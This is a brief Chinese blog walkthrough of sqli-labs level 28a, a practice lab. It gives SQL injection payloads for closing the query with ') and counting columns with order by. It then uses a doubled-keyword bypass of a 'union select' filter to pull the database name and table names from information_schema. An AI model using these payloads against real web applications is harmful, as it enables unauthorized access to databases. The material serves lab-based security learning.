sqli-labs(28a)

博客围绕SQL注入展开,先提到构造闭合来爆字段数,查看源码发现仅过滤了union select,尝试进行闭合操作;接着介绍用28关语句构造来爆库名,还提及爆表名相关内容。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0X01构造闭合 爆字段数

/?id=1') order by 1%23

?id=1') order by 5%23

 

偷看一下源码

就只过滤了union select

闭合')

那我们来尝试一下

0X02爆库名

用我们28关的语句继续构造

-1') uniounion selectn select 1,database(),3%23

0X02爆表名

/?id=-1') uniounion selectn select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),3%23

 

 

学习之路 少就是多 慢就是快

转载于:https://www.cnblogs.com/-zhong/p/10941756.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值